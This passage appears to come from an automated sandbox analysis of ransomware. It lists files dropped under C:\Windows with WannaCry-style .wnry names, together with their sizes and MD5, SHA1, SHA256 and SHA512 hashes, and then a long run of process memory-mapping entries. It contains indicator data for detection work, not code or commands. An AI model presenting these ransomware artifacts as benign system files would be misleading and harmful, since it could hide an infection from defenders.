                                941fa0a1f6a5756ed54260994db6158a7ebeb9e18b5c8ca2f6530c579bc4455918df0b38c609f501ca466b3cc067b40e4b861ad6513373b483b36338ae20a810

                              • C:\Windows\msg\m_filipino.wnry
                                Filesize

                                36KB

                                MD5

                                08b9e69b57e4c9b966664f8e1c27ab09

                                SHA1

                                2da1025bbbfb3cd308070765fc0893a48e5a85fa

                                SHA256

                                d8489f8c16318e524b45de8b35d7e2c3cd8ed4821c136f12f5ef3c9fc3321324

                                SHA512

                                966b5ed68be6b5ccd46e0de1fa868cfe5432d9bf82e1e2f6eb99b2aef3c92f88d96f4f4eec5e16381b9c6db80a68071e7124ca1474d664bdd77e1817ec600cb4

                              • C:\Windows\msg\m_finnish.wnry
                                Filesize

                                37KB

                                MD5

                                35c2f97eea8819b1caebd23fee732d8f

                                SHA1

                                e354d1cc43d6a39d9732adea5d3b0f57284255d2

                                SHA256

                                1adfee058b98206cb4fbe1a46d3ed62a11e1dee2c7ff521c1eef7c706e6a700e

                                SHA512

                                908149a6f5238fcccd86f7c374986d486590a0991ef5243f0cd9e63cc8e208158a9a812665233b09c3a478233d30f21e3d355b94f36b83644795556f147345bf

                              • C:\Windows\msg\m_french.wnry
                                Filesize

                                37KB

                                MD5

                                4e57113a6bf6b88fdd32782a4a381274

                                SHA1

                                0fccbc91f0f94453d91670c6794f71348711061d

                                SHA256

                                9bd38110e6523547aed50617ddc77d0920d408faeed2b7a21ab163fda22177bc

                                SHA512

                                4f1918a12269c654d44e9d394bc209ef0bc32242be8833a2fba437b879125177e149f56f2fb0c302330dec328139b34982c04b3fefb045612b6cc9f83ec85aa9

                              • C:\Windows\msg\m_german.wnry
                                Filesize

                                36KB

                                MD5

                                3d59bbb5553fe03a89f817819540f469

                                SHA1

                                26781d4b06ff704800b463d0f1fca3afd923a9fe

                                SHA256

                                2adc900fafa9938d85ce53cb793271f37af40cf499bcc454f44975db533f0b61

                                SHA512

                                95719ae80589f71209bb3cb953276538040e7111b994d757b0a24283aefe27aadbbe9eef3f1f823ce4cabc1090946d4a2a558607ac6cac6faca5971529b34dac

                              • C:\Windows\msg\m_greek.wnry
                                Filesize

                                47KB

                                MD5

                                fb4e8718fea95bb7479727fde80cb424

                                SHA1

                                1088c7653cba385fe994e9ae34a6595898f20aeb

                                SHA256

                                e13cc9b13aa5074dc45d50379eceb17ee39a0c2531ab617d93800fe236758ca9

                                SHA512

                                24db377af1569e4e2b2ebccec42564cea95a30f1ff43bcaf25a692f99567e027bcef4aacef008ec5f64ea2eef0c04be88d2b30bcadabb3919b5f45a6633940cb

                              • C:\Windows\msg\m_indonesian.wnry
                                Filesize

                                36KB

                                MD5

                                3788f91c694dfc48e12417ce93356b0f

                                SHA1

                                eb3b87f7f654b604daf3484da9e02ca6c4ea98b7

                                SHA256

                                23e5e738aad10fb8ef89aa0285269aff728070080158fd3e7792fe9ed47c51f4

                                SHA512

                                b7dd9e6dc7c2d023ff958caf132f0544c76fae3b2d8e49753257676cc541735807b4befdf483bcae94c2dcde3c878c783b4a89dca0fecbc78f5bbf7c356f35cd

                              • C:\Windows\msg\m_italian.wnry
                                Filesize

                                36KB

                                MD5

                                30a200f78498990095b36f574b6e8690

                                SHA1

                                c4b1b3c087bd12b063e98bca464cd05f3f7b7882

                                SHA256

                                49f2c739e7d9745c0834dc817a71bf6676ccc24a4c28dcddf8844093aab3df07

                                SHA512

                                c0da2aae82c397f6943a0a7b838f60eeef8f57192c5f498f2ecf05db824cfeb6d6ca830bf3715da7ee400aa8362bd64dc835298f3f0085ae7a744e6e6c690511

                              • C:\Windows\msg\m_japanese.wnry
                                Filesize

                                79KB

                                MD5

                                b77e1221f7ecd0b5d696cb66cda1609e

                                SHA1

                                51eb7a254a33d05edf188ded653005dc82de8a46

                                SHA256

                                7e491e7b48d6e34f916624c1cda9f024e86fcbec56acda35e27fa99d530d017e

                                SHA512

                                f435fd67954787e6b87460db026759410fbd25b2f6ea758118749c113a50192446861a114358443a129be817020b50f21d27b1ebd3d22c7be62082e8b45223fc

                              • C:\Windows\msg\m_korean.wnry
                                Filesize

                                89KB

                                MD5

                                6735cb43fe44832b061eeb3f5956b099

                                SHA1

                                d636daf64d524f81367ea92fdafa3726c909bee1

                                SHA256

                                552aa0f82f37c9601114974228d4fc54f7434fe3ae7a276ef1ae98a0f608f1d0

                                SHA512

                                60272801909dbba21578b22c49f6b0ba8cd0070f116476ff35b3ac8347b987790e4cc0334724244c4b13415a246e77a577230029e4561ae6f04a598c3f536c7e

                              • C:\Windows\msg\m_latvian.wnry
                                Filesize

                                40KB

                                MD5

                                c33afb4ecc04ee1bcc6975bea49abe40

                                SHA1

                                fbea4f170507cde02b839527ef50b7ec74b4821f

                                SHA256

                                a0356696877f2d94d645ae2df6ce6b370bd5c0d6db3d36def44e714525de0536

                                SHA512

                                0d435f0836f61a5ff55b78c02fa47b191e5807a79d8a6e991f3115743df2141b3db42ba8bdad9ad259e12f5800828e9e72d7c94a6a5259312a447d669b03ec44

                              • C:\Windows\msg\m_norwegian.wnry
                                Filesize

                                36KB

                                MD5

                                ff70cc7c00951084175d12128ce02399

                                SHA1

                                75ad3b1ad4fb14813882d88e952208c648f1fd18

                                SHA256

                                cb5da96b3dfcf4394713623dbf3831b2a0b8be63987f563e1c32edeb74cb6c3a

                                SHA512

                                f01df3256d49325e5ec49fd265aa3f176020c8ffec60eb1d828c75a3fa18ff8634e1de824d77dfdd833768acff1f547303104620c70066a2708654a07ef22e19

                              • C:\Windows\msg\m_polish.wnry
                                Filesize

                                38KB

                                MD5

                                e79d7f2833a9c2e2553c7fe04a1b63f4

                                SHA1

                                3d9f56d2381b8fe16042aa7c4feb1b33f2baebff

                                SHA256

                                519ad66009a6c127400c6c09e079903223bd82ecc18ad71b8e5cd79f5f9c053e

                                SHA512

                                e0159c753491cac7606a7250f332e87bc6b14876bc7a1cf5625fa56ab4f09c485f7b231dd52e4ff0f5f3c29862afb1124c0efd0741613eb97a83cbe2668af5de

                              • C:\Windows\msg\m_portuguese.wnry
                                Filesize

                                37KB

                                MD5

                                fa948f7d8dfb21ceddd6794f2d56b44f

                                SHA1

                                ca915fbe020caa88dd776d89632d7866f660fc7a

                                SHA256

                                bd9f4b3aedf4f81f37ec0a028aabcb0e9a900e6b4de04e9271c8db81432e2a66

                                SHA512

                                0d211bfb0ae953081dca00cd07f8c908c174fd6c47a8001fadc614203f0e55d9fbb7fa9b87c735d57101341ab36af443918ee00737ed4c19ace0a2b85497f41a

                              • C:\Windows\msg\m_romanian.wnry
                                Filesize

                                50KB

                                MD5

                                313e0ececd24f4fa1504118a11bc7986

                                SHA1

                                e1b9ae804c7fb1d27f39db18dc0647bb04e75e9d

                                SHA256

                                70c0f32ed379ae899e5ac975e20bbbacd295cf7cd50c36174d2602420c770ac1

                                SHA512

                                c7500363c61baf8b77fce796d750f8f5e6886ff0a10f81c3240ea3ad4e5f101b597490dea8ab6bd9193457d35d8fd579fce1b88a1c8d85ebe96c66d909630730

                              • C:\Windows\msg\m_russian.wnry
                                Filesize

                                46KB

                                MD5

                                452615db2336d60af7e2057481e4cab5

                                SHA1

                                442e31f6556b3d7de6eb85fbac3d2957b7f5eac6

                                SHA256

                                02932052fafe97e6acaaf9f391738a3a826f5434b1a013abbfa7a6c1ade1e078

                                SHA512

                                7613dc329abe7a3f32164c9a6b660f209a84b774ab9c008bf6503c76255b30ea9a743a6dc49a8de8df0bcb9aea5a33f7408ba27848d9562583ff51991910911f

                              • C:\Windows\msg\m_slovak.wnry
                                Filesize

                                40KB

                                MD5

                                c911aba4ab1da6c28cf86338ab2ab6cc

                                SHA1

                                fee0fd58b8efe76077620d8abc7500dbfef7c5b0

                                SHA256

                                e64178e339c8e10eac17a236a67b892d0447eb67b1dcd149763dad6fd9f72729

                                SHA512

                                3491ed285a091a123a1a6d61aafbb8d5621ccc9e045a237a2f9c2cf6049e7420eb96ef30fdcea856b50454436e2ec468770f8d585752d73fafd676c4ef5e800a

                              • C:\Windows\msg\m_spanish.wnry
                                Filesize

                                36KB

                                MD5

                                8d61648d34cba8ae9d1e2a219019add1

                                SHA1

                                2091e42fc17a0cc2f235650f7aad87abf8ba22c2

                                SHA256

                                72f20024b2f69b45a1391f0a6474e9f6349625ce329f5444aec7401fe31f8de1

                                SHA512

                                68489c33ba89edfe2e3aebaacf8ef848d2ea88dcbef9609c258662605e02d12cfa4ffdc1d266fc5878488e296d2848b2cb0bbd45f1e86ef959bab6162d284079

                              • C:\Windows\msg\m_swedish.wnry
                                Filesize

                                37KB

                                MD5

                                c7a19984eb9f37198652eaf2fd1ee25c

                                SHA1

                                06eafed025cf8c4d76966bf382ab0c5e1bd6a0ae

                                SHA256

                                146f61db72297c9c0facffd560487f8d6a2846ecec92ecc7db19c8d618dbc3a4

                                SHA512

                                43dd159f9c2eac147cbff1dda83f6a83dd0c59d2d7acac35ba8b407a04ec9a1110a6a8737535d060d100ede1cb75078cf742c383948c9d4037ef459d150f6020

                              • C:\Windows\msg\m_turkish.wnry
                                Filesize

                                41KB

                                MD5

                                531ba6b1a5460fc9446946f91cc8c94b

                                SHA1

                                cc56978681bd546fd82d87926b5d9905c92a5803

                                SHA256

                                6db650836d64350bbde2ab324407b8e474fc041098c41ecac6fd77d632a36415

                                SHA512

                                ef25c3cf4343df85954114f59933c7cc8107266c8bcac3b5ea7718eb74dbee8ca8a02da39057e6ef26b64f1dfccd720dd3bf473f5ae340ba56941e87d6b796c9

                              • C:\Windows\msg\m_vietnamese.wnry
                                Filesize

                                91KB

                                MD5

                                8419be28a0dcec3f55823620922b00fa

                                SHA1

                                2e4791f9cdfca8abf345d606f313d22b36c46b92

                                SHA256

                                1f21838b244c80f8bed6f6977aa8a557b419cf22ba35b1fd4bf0f98989c5bdf8

                                SHA512

                                8fca77e54480aea3c0c7a705263ed8fb83c58974f5f0f62f12cc97c8e0506ba2cdb59b70e59e9a6c44dd7cde6adeeec35b494d31a6a146ff5ba7006136ab9386

                              • C:\Windows\r.wnry
                                Filesize

                                864B

                                MD5

                                3e0020fc529b1c2a061016dd2469ba96

                                SHA1

                                c3a91c22b63f6fe709e7c29cafb29a2ee83e6ade

                                SHA256

                                402751fa49e0cb68fe052cb3db87b05e71c1d950984d339940cf6b29409f2a7c

                                SHA512

                                5ca3c134201ed39d96d72911c0498bae6f98701513fd7f1dc8512819b673f0ea580510fa94ed9413ccc73da18b39903772a7cbfa3478176181cee68c896e14cf

                              • C:\Windows\s.wnry
                                Filesize

                                2.9MB

                                MD5

                                ad4c9de7c8c40813f200ba1c2fa33083

                                SHA1

                                d1af27518d455d432b62d73c6a1497d032f6120e

                                SHA256

                                e18fdd912dfe5b45776e68d578c3af3547886cf1353d7086c8bee037436dff4b

                                SHA512

                                115733d08e5f1a514808a20b070db7ff453fd149865f49c04365a8c6502fa1e5c3a31da3e21f688ab040f583cf1224a544aea9708ffab21405dde1c57f98e617

                              • C:\Windows\taskdl.exe
                                Filesize

                                20KB

                                MD5

                                4fef5e34143e646dbf9907c4374276f5

                                SHA1

                                47a9ad4125b6bd7c55e4e7da251e23f089407b8f

                                SHA256

                                4a468603fdcb7a2eb5770705898cf9ef37aade532a7964642ecd705a74794b79

                                SHA512

                                4550dd1787deb353ebd28363dd2cdccca861f6a5d9358120fa6aa23baa478b2a9eb43cef5e3f6426f708a0753491710ac05483fac4a046c26bec4234122434d5

                              • C:\Windows\taskdl.exe
                                Filesize

                                20KB

                                MD5

                                4fef5e34143e646dbf9907c4374276f5

                                SHA1

                                47a9ad4125b6bd7c55e4e7da251e23f089407b8f

                                SHA256

                                4a468603fdcb7a2eb5770705898cf9ef37aade532a7964642ecd705a74794b79

                                SHA512

                                4550dd1787deb353ebd28363dd2cdccca861f6a5d9358120fa6aa23baa478b2a9eb43cef5e3f6426f708a0753491710ac05483fac4a046c26bec4234122434d5

                              • C:\Windows\vc_redist.x86.exe
                                Filesize

                                13.1MB

                                MD5

                                1a15e6606bac9647e7ad3caa543377cf

                                SHA1

                                bfb74e498c44d3a103ca3aa2831763fb417134d1

                                SHA256

                                fdd1e1f0dcae2d0aa0720895eff33b927d13076e64464bb7c7e5843b7667cd14

                                SHA512

                                e8cb67fc8e0312da3cc98364b96dfa1a63150ab9de60069c4af60c1cf77d440b7dffe630b4784ba07ea9bf146bdbf6ad5282a900ffd6ab7d86433456a752b2fd

                              • C:\Windows\vc_redist.x86.exe
                                Filesize

                                13.1MB

                                MD5

                                1a15e6606bac9647e7ad3caa543377cf

                                SHA1

                                bfb74e498c44d3a103ca3aa2831763fb417134d1

                                SHA256

                                fdd1e1f0dcae2d0aa0720895eff33b927d13076e64464bb7c7e5843b7667cd14

                                SHA512

                                e8cb67fc8e0312da3cc98364b96dfa1a63150ab9de60069c4af60c1cf77d440b7dffe630b4784ba07ea9bf146bdbf6ad5282a900ffd6ab7d86433456a752b2fd

                              • C:\Windows\vc_redist.x86.exe
                                Filesize

                                13.1MB

                                MD5

                                1a15e6606bac9647e7ad3caa543377cf

                                SHA1

                                bfb74e498c44d3a103ca3aa2831763fb417134d1

                                SHA256

                                fdd1e1f0dcae2d0aa0720895eff33b927d13076e64464bb7c7e5843b7667cd14

                                SHA512

                                e8cb67fc8e0312da3cc98364b96dfa1a63150ab9de60069c4af60c1cf77d440b7dffe630b4784ba07ea9bf146bdbf6ad5282a900ffd6ab7d86433456a752b2fd

                              • memory/384-139-0x0000000000000000-mapping.dmp
                              • memory/396-164-0x0000000000000000-mapping.dmp
                              • memory/532-143-0x0000000000000000-mapping.dmp
                              • memory/532-157-0x0000000000400000-0x00000000005CC000-memory.dmp
                                Filesize

                                1.8MB

                              • memory/540-165-0x0000000005F10000-0x0000000005F76000-memory.dmp
                                Filesize

                                408KB

                              • memory/540-132-0x0000000000000000-mapping.dmp
                              • memory/540-198-0x0000000007930000-0x00000000079C2000-memory.dmp
                                Filesize

                                584KB

                              • memory/540-192-0x0000000006A10000-0x0000000006A2A000-memory.dmp
                                Filesize

                                104KB

                              • memory/540-190-0x0000000007BA0000-0x000000000821A000-memory.dmp
                                Filesize

                                6.5MB

                              • memory/540-154-0x00000000056C0000-0x0000000005CE8000-memory.dmp
                                Filesize

                                6.2MB

                              • memory/540-162-0x0000000005EA0000-0x0000000005F06000-memory.dmp
                                Filesize

                                408KB

                              • memory/540-175-0x0000000006580000-0x000000000659E000-memory.dmp
                                Filesize

                                120KB

                              • memory/1428-269-0x0000000000000000-mapping.dmp
                              • memory/1852-258-0x0000000000000000-mapping.dmp
                              • memory/2084-263-0x0000000000000000-mapping.dmp
                              • memory/2164-152-0x0000000000000000-mapping.dmp
                              • memory/2244-144-0x0000000000000000-mapping.dmp
                              • memory/2632-187-0x0000000000000000-mapping.dmp
                              • memory/2812-181-0x0000000000000000-mapping.dmp
                              • memory/3096-158-0x0000000000000000-mapping.dmp
                              • memory/3112-246-0x0000000000000000-mapping.dmp
                              • memory/3384-174-0x0000000000000000-mapping.dmp
                              • memory/3420-185-0x0000000000000000-mapping.dmp
                              • memory/3432-178-0x0000000000000000-mapping.dmp
                              • memory/3432-244-0x0000000000000000-mapping.dmp
                              • memory/3740-200-0x0000000000000000-mapping.dmp
                              • memory/3744-252-0x0000000000460000-0x000000000075E000-memory.dmp
                                Filesize

                                3.0MB

                              • memory/3744-253-0x00000000740C0000-0x0000000074142000-memory.dmp
                                Filesize

                                520KB

                              • memory/3744-255-0x000000006C4F0000-0x000000006C572000-memory.dmp
                                Filesize

                                520KB

                              • memory/3744-247-0x0000000000000000-mapping.dmp
                              • memory/3744-265-0x00000000740C0000-0x0000000074142000-memory.dmp
                                Filesize

                                520KB

                              • memory/3744-257-0x0000000000460000-0x000000000075E000-memory.dmp
                                Filesize

                                3.0MB

                              • memory/3744-266-0x000000006C250000-0x000000006C46C000-memory.dmp
                                Filesize

                                2.1MB

                              • memory/3744-256-0x000000006C9D0000-0x000000006C9F2000-memory.dmp
                                Filesize

                                136KB

                              • memory/3744-248-0x00000000740C0000-0x0000000074142000-memory.dmp
                                Filesize

                                520KB

                              • memory/3744-267-0x000000006C4F0000-0x000000006C572000-memory.dmp
                                Filesize

                                520KB

                              • memory/3744-254-0x000000006C250000-0x000000006C46C000-memory.dmp
                                Filesize

                                2.1MB

                              • memory/3744-251-0x000000006C9D0000-0x000000006C9F2000-memory.dmp
                                Filesize

                                136KB

                              • memory/3744-268-0x0000000000460000-0x000000000075E000-memory.dmp
                                Filesize

                                3.0MB

                              • memory/3744-249-0x000000006C250000-0x000000006C46C000-memory.dmp
                                Filesize

                                2.1MB

                              • memory/3744-250-0x000000006C4F0000-0x000000006C572000-memory.dmp
                                Filesize

                                520KB

                              • memory/3756-245-0x0000000000000000-mapping.dmp
                              • memory/3892-264-0x0000000000000000-mapping.dmp
                              • memory/3900-172-0x0000000000000000-mapping.dmp
                              • memory/4116-260-0x0000000000000000-mapping.dmp
                              • memory/4260-261-0x0000000000000000-mapping.dmp
                              • memory/4300-163-0x0000000000000000-mapping.dmp
                              • memory/4628-150-0x0000000002E30000-0x0000000002E66000-memory.dmp
                                Filesize

                                216KB

                              • memory/4628-243-0x0000000007A50000-0x0000000007A58000-memory.dmp
                                Filesize

                                32KB

                              • memory/4628-242-0x0000000007A60000-0x0000000007A7A000-memory.dmp
                                Filesize

                                104KB

                              • memory/4628-241-0x0000000007960000-0x000000000796E000-memory.dmp
                                Filesize

                                56KB

                              • memory/4628-199-0x00000000077A0000-0x00000000077AA000-memory.dmp
                                Filesize

                                40KB

                              • memory/4628-195-0x00000000069D0000-0x00000000069EE000-memory.dmp
                                Filesize

                                120KB

                              • memory/4628-202-0x00000000079A0000-0x0000000007A36000-memory.dmp
                                Filesize

                                600KB

                              • memory/4628-194-0x00000000695A0000-0x00000000695EC000-memory.dmp
                                Filesize

                                304KB

                              • memory/4628-191-0x00000000075D0000-0x0000000007602000-memory.dmp
                                Filesize

                                200KB

                              • memory/4628-161-0x0000000005470000-0x0000000005492000-memory.dmp
                                Filesize

                                136KB

                              • memory/4628-133-0x0000000000000000-mapping.dmp
                              • memory/4760-166-0x0000000010000000-0x0000000010010000-memory.dmp
                                Filesize

                                64KB

                              • memory/4760-156-0x0000000000000000-mapping.dmp
                              • memory/4796-137-0x0000000000000000-mapping.dmp
                              • memory/4856-262-0x0000000000000000-mapping.dmp
                              • memory/4896-170-0x0000000005BE0000-0x0000000006184000-memory.dmp
                                Filesize

                                5.6MB

                              • memory/4896-176-0x0000000009E70000-0x0000000009EA8000-memory.dmp
                                Filesize

                                224KB

                              • memory/4896-177-0x0000000009E20000-0x0000000009E2E000-memory.dmp
                                Filesize

                                56KB

                              • memory/4896-182-0x000000000A180000-0x000000000A190000-memory.dmp
                                Filesize

                                64KB

                              • memory/4896-183-0x000000000A170000-0x000000000A180000-memory.dmp
                                Filesize

                                64KB

                              • memory/4896-151-0x0000000000660000-0x0000000000D0E000-memory.dmp
                                Filesize

                                6.7MB

                              • memory/4896-134-0x0000000000000000-mapping.dmp
                              • memory/5068-259-0x0000000000000000-mapping.dmp
                              • memory/5084-188-0x0000000000000000-mapping.dmp